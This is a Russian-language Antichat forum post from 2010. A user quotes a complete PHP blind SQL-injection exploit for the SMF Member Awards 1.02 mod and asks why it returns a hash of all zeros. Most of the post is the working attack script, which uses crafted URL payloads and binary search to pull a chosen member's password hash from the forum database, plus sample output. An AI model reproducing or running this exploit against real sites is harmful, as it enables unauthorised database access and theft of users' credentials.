HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу проблема с хэшем
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

проблема с хэшем
  #1  
Старый 22.03.2010, 16:28
Pike as
Новичок
Регистрация: 11.11.2007
Сообщений: 3
С нами: 9735880

Репутация: 0
По умолчанию проблема с хэшем
Код:
Сообщение от oRb  
Member Awards 1.02 Blind SQL-Injection exploit
Vulnerability: mailbrush
Code: oRb
Thnx: Grey, eLWAux

Использует бинарный поиск. В начале скрипта конфиг:
$url - урл до smf
$member_id - кого брутить
$tbl_prefix - префикс таблиц
$error - текст ошибки, если награда не найдена.

Example:
Код:

$ php smf.php passwd: c22dcc8d6b9378b8fad65ab2a359fbdd60dfcb86 Requests: 160 Time: 00:00:32

Сам сплоит
Код:
<?php
/*
 * Member Awards 1.02 Blind SQL-Injection
 * Vulnerability: mailbrush
 * Code: oRb
 * Thnx: Grey, eLWAux
 */
$url = 'http://test.ru/smf/';
$member_id = 1;
$tbl_prefix = 'smf_';
$error = 'history.go(-1)';

/*
 * Let's go!
 */
set_time_limit(0);
$url .= 'index.php?action=profile;sa=awardsMembers;u='.$member_id.';id=0+or+1';
function getcontent($url) {
	$GLOBALS['requests']++;
	return @file_get_contents($url);
}
function getmicrotime()  {
    list($usec, $sec) = explode(" ", microtime());
    return ((float)$usec + (float)$sec);
}
function binary($pattern, $c, $column) {
	$n = count($pattern);
	$k = (int)$n/2;
	$values = array();
	for($j=0;$j<$k;++$j)
		$values[] = $pattern[$j];
	$result = getcontent($GLOBALS['url'].'+and+(%23)%0Aselect+ascii(substr('.$column.','.($c+1).',1))+from+'.$GLOBALS['tbl_prefix'].'members+where+ID_MEMBER='.$GLOBALS['member_id'].')+in+('.implode(',', $values).')');
	if( $n == 2 ) {
		if (strpos($result, $GLOBALS['error']) === false)
			return $pattern[0];
		else
			return $pattern[1];
	} elseif(strpos($result, $GLOBALS['error']) === false) {
		return binary($values, $c, $column);
	} else {
		$values = array();
		for($j=$k;$j<$n;++$j)
			$values[] = $pattern[$j];
		return binary($values, $c, $column);
	}
}
function printField($column, $n) {
	echo $column.': ';
	$GLOBALS['requests'] = 0;
	$time_start = getmicrotime();
	$pattern = array_map('ord', str_split('0123456789abcdef'));
	for($i=0; $i<$n; ++$i)
		echo chr(binary($pattern, $i, $column));
	echo "\nRequests: ".$GLOBALS['requests']."\nTime: ".gmdate("H:i:s", getmicrotime()-$time_start)."\n";
}
printField('passwd', 40);
?>
мой результат
Код:
passwd: 0000000000000000000000000000000000000000 Requests: 160 
Time: 00:00:32
в чем может заключаться проблема?
Может ли повлиять неправильный префикс?
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Pike as; 22.03.2010 в 17:38..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с микрофоном Rio-de-Janeiro Болталка 14 14.01.2010 20:55
Проблема с дедиками [help!] Sniper482 Безопасность и Анонимность 4 14.09.2009 21:22
У меня проблема - вирус, не могу вообще войти в контакт Strake Защита ОС: вирусы, антивирусы, файрволы. 10 20.06.2009 12:16
Непонятная проблема с интернетом по всей локалке ZneP Для Администратора 6 19.06.2009 15:27
Проблема с Хэшем Kond4r Криптография, расшифровка хешей 14 09.10.2005 15:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.